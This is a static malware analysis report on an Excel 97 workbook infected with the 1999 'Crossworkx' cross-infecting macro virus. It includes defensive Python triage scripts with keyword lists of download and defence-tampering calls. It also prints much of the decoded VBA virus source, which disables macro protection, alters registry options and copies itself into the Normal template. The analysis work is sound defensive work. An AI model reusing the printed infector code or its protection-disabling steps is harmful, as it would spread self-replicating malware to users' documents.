Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2498e4836bcc7563…

MALICIOUS

Office (OLE)

52.0 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: bfca009fdd5bd6e6151882e6845d28b8 SHA-1: 8bed9da47ee007c328e662206e715d61d26facfa SHA-256: 2498e4836bcc7563607fe935fb7d4711b6ecede7d841a015a5f10db83dd4c9c9
460 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel 97 era OLE workbook carrying VBA macros. The extracted source identifies itself as the 1999 "Office97Macro.Crossworkx" macro virus (module "Cross"), and its AutoOpen routine is the whole infection logic: it turns off Options.VirusProtection and the Normal-template save prompt, clears the read-only attribute on the Normal template, blanks the Office 8.0 "Options6" registry values through System.PrivateProfileString, greys out several View, Format and Tools menu controls, silences alerts, exports its own module to c:\cross.sys, re-imports it into the Normal template and the active document (saving the document afterwards), and then starts a hidden Excel instance through CreateObject("excel.application") when its FileSearch for Workbook_.xls under Application.Path finds nothing. The mix of Word objects (Options, NormalTemplate, ActiveDocument, wdAlertsNone) with Excel automation marks it as a Word/Excel cross-infector; ClamAV flags the decoded source as Doc.Trojan.Exceller-1. Nothing in the visible source downloads anything: the AutoOpen plus CreateObject combination here serves self-replication across host applications, not a second-stage payload, so the generic "download" tokens reported by the keyword heuristics should not be read as observed network activity.

The embedded-OLE, slack and empty-directory findings all describe the 28,484-byte body carved at offset 0x60BC. That body ends exactly at byte 53,248, the end of the 52.0 KB parent, so the carve simply runs from a second CFB signature inside the parent to end of file. A fragment cut that way has no directory of its own, which is enough to produce both the "no readable streams" and "100% slack" results without any hidden payload, and ClamAV finds nothing in it. Weight those findings below the macro findings.
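Keyword triage of the decoded macro source, as example code added for this page (not the scanner's or olevba's implementation): it classifies auto-exec entry points, execution and download calls, defence tampering and self-replication calls, lists Win32 Declare imports, and derives a verdict. The keyword classes, the severity rule and the SAMPLE excerpt (trimmed from the macros.bas listing further down) are this example's assumptions.

```python
"""Keyword triage for extracted VBA source, modelled on the report's
OLE_VBA_AUTOOPEN / OLE_VBA_CREATEOBJ style findings.  Added example; the
keyword classes and severity rule are assumptions, not the scanner's rules."""
import re

RULES = {
    "autoexec": ["AutoOpen", "Auto_Open", "AutoExec", "AutoClose", "Auto_Close",
                 "Workbook_Open", "Document_Open"],
    "execution": ["CreateObject", "GetObject", "Shell", "WScript.Shell"],
    "download": ["URLDownloadToFile", "XMLHTTP", "WinHttpRequest",
                 "InternetOpen", "ADODB.Stream"],
    # statements that switch off or bypass the host application's macro defences
    "defense_tamper": ["VirusProtection", "DisplayAlerts", "AccessVBOM",
                       "VBE.ActiveVBProject", "PrivateProfileString"],
    # the 1999-style infector pattern: copy the module into other VBA projects
    "self_replication": ["VBComponents", "Export", "Import",
                         "NormalTemplate", "SaveAs"],
}

# A keyword counts only as a whole identifier ("Shell" does not match inside
# ShellExecute); a leading "." is allowed so that ".Export" is still seen.
_COMPILED = {
    label: [(kw, re.compile(r"(?<!\w)" + re.escape(kw) + r"(?!\w)", re.I))
            for kw in kws]
    for label, kws in RULES.items()
}

# Win32 imports: `[Public|Private] Declare [PtrSafe] Function|Sub name Lib "dll"`
_DECLARE = re.compile(
    r'^\s*(?:Public|Private)?\s*Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+'
    r'(\w+)\s+Lib\s+"([^"]+)"', re.I | re.M)


def _verdict(f):
    # Severity rule (assumption): an auto-exec entry point combined with anything
    # that executes, downloads or disables defences is the high-confidence case.
    if f["autoexec"] and (f["execution"] or f["download"] or f["defense_tamper"]):
        return "high"
    if f["autoexec"] or f["execution"] or f["download"]:
        return "medium"
    return "low"


def triage_vba(source):
    """Return matched keywords per class, declared Win32 imports and a verdict."""
    findings = {label: sorted(kw for kw, rx in pats if rx.search(source))
                for label, pats in _COMPILED.items()}
    findings["declares"] = [(name, lib.lower()) for name, lib in _DECLARE.findall(source)]
    findings["verdict"] = _verdict(findings)
    return findings


# Constructed excerpt of the macro shown in this report (trimmed, not the full module).
SAMPLE = r'''Attribute VB_Name = "Cross"
Rem Name:   Office97Macro.Crossworkx
Public Const ModulName = "Cross"
Public Declare Function SetCursorPos Lib "user32" _
    (ByVal x As Long, ByVal y As Long) As Long
Public Declare Function GetCursorPos Lib "user32" _
    (lpPoint As Maus) As Long
Public Declare Sub Sleep Lib "kernel32" _
    (ByVal dwMilliseconds As Long)
Sub AutoOpen()
On Error Resume Next
Options.VirusProtection = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
Application.DisplayAlerts = wdAlertsNone
Application.VBE.ActiveVBProject.VBComponents(ModulName).Export "c:\cross.sys"
Set Normal_ = NormalTemplate.VBProject.VBComponents
If NormalIns = False Then
    Normal_.Import "c:\cross.sys"
End If
ActiveDocument.SaveAs ActiveDocument.FullName
Set excelx = CreateObject("excel.application")
End Sub
'''

if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE).items():
        print("%-17s %s" % (key, value))
```

Run against the excerpt, the verdict is "high" from the auto-exec entry point plus CreateObject and the defence-tampering statements, while the download class stays empty, which is the distinction the summary above draws: the execution calls serve replication, not a downloader.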

Heuristics 10

  • ClamAV: Doc.Trojan.Exceller-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Exceller-1
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 28,484 bytes but its declared streams total only 0 bytes — 28,484 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
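The two structural heuristics above (OLE_SLACK_ANOMALY and OLE_PARSE_EMPTY_STREAMS) reduce to three numbers from the CFB header, FAT and directory: how many bytes the directory's stream entries declare, how many sectors the FAT allocates, and how much of the file neither accounts for. The following is example code added for this page, not the scanner's implementation; the 25% slack threshold and the in-memory CFB builder (used to construct a normal single-stream container and a "hollow" one that reproduces both findings) are this example's assumptions.

```python
"""Structural triage of a CFB/OLE2 container: sum declared stream sizes, count
FAT-allocated sectors, and measure unallocated bytes.  Added example; the
threshold and the builder are assumptions, not the scanner's logic."""
import struct

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
FREESECT, ENDOFCHAIN, FATSECT, NOSTREAM = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD, 0xFFFFFFFF
STREAM, ROOT = 2, 5
SLACK_THRESHOLD = 0.25   # assumption: flag when more than 25% of the file is unallocated


def _sector(data, n, size):
    """Sector n follows the 512-byte header; returns b'' when it lies past EOF."""
    return data[512 + n * size: 512 + (n + 1) * size]


def _chain(fat, start):
    """Follow a FAT chain, stopping on end markers, out-of-range links or loops."""
    seen, cur = [], start
    while cur < len(fat) and cur not in seen:
        seen.append(cur)
        cur = fat[cur]
    return seen


def triage_cfb(data):
    if len(data) < 512 or data[:8] != CFB_MAGIC:
        raise ValueError("not a CFB container")
    sec = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    n_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    difat = struct.unpack_from("<109I", data, 0x4C)
    fat = []                       # v3 files with <110 FAT sectors list them all in the header
    for s in difat[:n_fat]:
        raw = _sector(data, s, sec)
        fat.extend(struct.unpack_from("<%dI" % (len(raw) // 4), raw))
    streams = []
    for d in _chain(fat, first_dir):
        raw = _sector(data, d, sec)
        for i in range(len(raw) // 128):
            entry = raw[i * 128:(i + 1) * 128]
            name_len, kind = struct.unpack_from("<HB", entry, 0x40)
            if kind != STREAM:
                continue           # root, storages and unused slots carry no data
            name = entry[:max(name_len - 2, 0)].decode("utf-16-le", "replace")
            streams.append((name, struct.unpack_from("<I", entry, 0x78)[0]))
    allocated = sum(1 for x in fat if x != FREESECT)          # FAT, directory and data sectors
    unallocated = max(len(data) - 512 - allocated * sec, 0)   # bytes no FAT entry points to
    result = {"streams": streams, "stream_count": len(streams),
              "declared_stream_bytes": sum(size for _, size in streams),
              "unallocated_bytes": unallocated,
              "unallocated_pct": round(100.0 * unallocated / len(data), 1),
              "findings": []}
    if not streams:
        result["findings"].append("OLE_PARSE_EMPTY_STREAMS")
    if unallocated > SLACK_THRESHOLD * len(data):
        result["findings"].append("OLE_SLACK_ANOMALY")
    return result


def _dir_entry(name, kind, start, size, child=NOSTREAM, right=NOSTREAM):
    raw = name.encode("utf-16-le") + b"\0\0"
    return struct.pack("<64sHBBIII16sI8s8sIQ", raw, len(raw), kind, 1,
                       NOSTREAM, right, child, b"\0" * 16, 0, b"\0" * 8, b"\0" * 8,
                       start, size)


def _header(n_fat, first_dir):
    fixed = struct.pack("<HHHHH6s9I", 0x3E, 3, 0xFFFE, 9, 6, b"\0" * 6,
                        0, n_fat, first_dir, 0, 0x1000, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    difat = struct.pack("<109I", 0, *([FREESECT] * 108))   # the FAT lives in sector 0
    return CFB_MAGIC + b"\0" * 16 + fixed + difat


def build_cfb(streams, trailing=b""):
    """Constructed v3 CFB: sector 0 = FAT, sector 1 = directory, one 512-byte
    sector per stream (max 3), then `trailing` bytes that no FAT entry covers."""
    assert len(streams) <= 3 and all(len(p) <= 512 for _, p in streams)
    fat = [FATSECT, ENDOFCHAIN]
    entries = [_dir_entry("Root Entry", ROOT, ENDOFCHAIN, 0,
                          child=1 if streams else NOSTREAM)]
    body = b""
    for i, (name, payload) in enumerate(streams):
        fat.append(ENDOFCHAIN)
        body += payload.ljust(512, b"\0")
        nxt = i + 2 if i + 1 < len(streams) else NOSTREAM
        entries.append(_dir_entry(name, STREAM, 2 + i, len(payload), right=nxt))
    fat_sector = struct.pack("<128I", *(fat + [FREESECT] * (128 - len(fat))))
    dir_sector = b"".join(entries).ljust(512, b"\0")
    return _header(1, 1) + fat_sector + dir_sector + body + trailing


if __name__ == "__main__":
    workbook = build_cfb([("Workbook", b"A" * 300)])           # fully accounted for
    hollow = build_cfb([], trailing=b"\x5A" * 2048)            # valid header, no streams, tail
    for label, blob in (("workbook", workbook), ("hollow", hollow)):
        print(label, triage_cfb(blob))
```

The "hollow" container is the shape the carved body at 0x60BC has from the parser's point of view: a valid header whose directory exposes no stream entries, with the bulk of the bytes sitting outside anything the FAT allocates. Both findings fire on it, which is why a fragment carved from an interior CFB signature to end of file will always trigger them even when nothing is hidden.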

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7824 bytes
SHA-256: 2ab0b27e97ee112e512d61563a4aef4d37bfed669f544013e88092a7a8378c99
Detection
ClamAV: Doc.Trojan.Exceller-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Cross"
Rem Name:   Office97Macro.Crossworkx
Rem Author: jack twoflower LineZer0/Metaphase
Rem Date:   May 1999


Public Const ModulName = "Cross"

Public Declare Function SetCursorPos Lib "user32" _
    (ByVal x As Long, ByVal y As Long) As Long

Public Declare Function GetCursorPos Lib "user32" _
    (lpPoint As Maus) As Long

Public Declare Sub Sleep Lib "kernel32" _
    (ByVal dwMilliseconds As Long)

Private Type Maus
       Xpos As Long
       Ypos As Long
End Type

Sub AutoOpen()
On Error Resume Next

Options.VirusProtection = False
Options.SaveNormalPrompt = False

SetAttr NormalTemplate.FullName, vbNormal

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""

CommandBars("View").Controls(6).Enabled = False
CommandBars("Format").Controls(12).Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
CommandBars("Tools").Controls(13).Enabled = False
CommandBars("Tools").Controls(14).Enabled = False

Application.DisplayAlerts = wdAlertsNone

Application.VBE.ActiveVBProject.VBComponents(ModulName).Export "c:\cross.sys"

Set Normal_ = NormalTemplate.VBProject.VBComponents
Set Active_ = ActiveDocument.VBProject.VBComponents

For i = 1 To Normal_.Count
    If Normal_(i).Name = ModulName Then NormalIns = True
Next i

For j = 1 To Active_.Count
    If Active_(j).Name = ModulName Then ActiveIns = True
Next j

If NormalIns = False Then
    Normal_.Import "c:\cross.sys"
End If

If ActiveIns = False Then
    Active_.Import "c:\cross.sys"
    ActiveDocument.SaveAs ActiveDocument.FullName
End If

With Application.FileSearch
    .LookIn = Application.Path
    .FileName = "Workbook_.xls"
    .SearchSubFolders = True
    .Execute
If .FoundFiles.Count <> 0 Then ExcelInstalled = True
End With
    
If ExcelInstalled = False Then

    Set excelx = CreateObject("excel.application")
    excelx.Visible = False
    
    excelx.CommandBars("Tools").Controls(10).Enabled = False
    excelx.CommandBars("Tools").Controls(12).Enabl
... (truncated)
embedded_office_off000060bc.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x60BC 28484 bytes
SHA-256: 3a8b37d6bfb574e99531c5e07bb7f6c925d08d3efa71fda20777e90db52f8f96
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.